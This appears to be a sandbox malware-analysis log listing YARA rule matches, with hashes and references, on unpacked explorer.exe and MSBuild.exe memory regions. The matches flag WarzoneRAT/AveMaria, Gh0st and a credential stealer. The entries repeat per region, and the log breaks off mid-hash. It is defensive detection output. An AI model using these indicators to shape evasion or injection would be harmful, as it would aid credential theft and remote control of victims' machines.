Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f0